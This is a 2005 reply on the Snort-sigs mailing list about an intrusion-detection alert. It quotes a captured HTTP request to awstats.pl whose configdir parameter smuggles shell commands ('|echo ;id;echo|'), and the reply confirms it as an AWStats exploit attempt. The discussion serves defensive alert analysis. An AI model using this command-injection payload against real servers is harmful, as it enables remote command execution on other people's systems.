-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Am Montag, 4. April 2005 17:02 schrieb Giles Coochey:
I saw the "WEB-ATTACKS id command attempt" triggered today, with the
following in the payload:
000 : 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 61 77 73 GET /cgi-bin/aws
010 : 74 61 74 73 2E 70 6C 3F 63 6F 6E 66 69 67 64 69 tats.pl?configdi
020 : 72 3D 7C 65 63 68 6F 25 32 30 3B 65 63 68 6F 25 r=|echo%20;echo%
030 : 32 30 3B 69 64 3B 65 63 68 6F 25 32 30 3B 65 63 20;id;echo%20;ec
040 : 68 6F 7C 20 48 54 54 50 2F 31 2E 31 0D 0A ho| HTTP/1.1..
Does that look like an awstats exploit attempt?
Yes.
Does anyone have a vulnerability report on this?
http://www.securityfocus.com/bid/keyword/
Should I attempt to report the source address to the appropriate
authority I get through a whois query?
Good Joke !!!
What do you do if this is in Russia or China? Do you really think that anybody
there takes care about you call?
- --
Dr. Michael Schwartzkopff
MultiNET Services GmbH
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFCUpGBqndXpO3Yl5sRAlWfAKCYYe0rmki4x8Mhm19adZI5EFaDNwCguSUH
/f5O95VJcNbgWwywuWDNz+Q=
=e4HQ
-----END PGP SIGNATURE-----
-------------------------------------------------------
SF email is sponsored by - The IT Product Guide
Read honest & candid reviews on hundreds of IT Products from real users.
Discover which products truly live up to the hype. Start reading now.
http://ads.osdn.com/?ad_ide95&alloc_id�396&opÌk
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
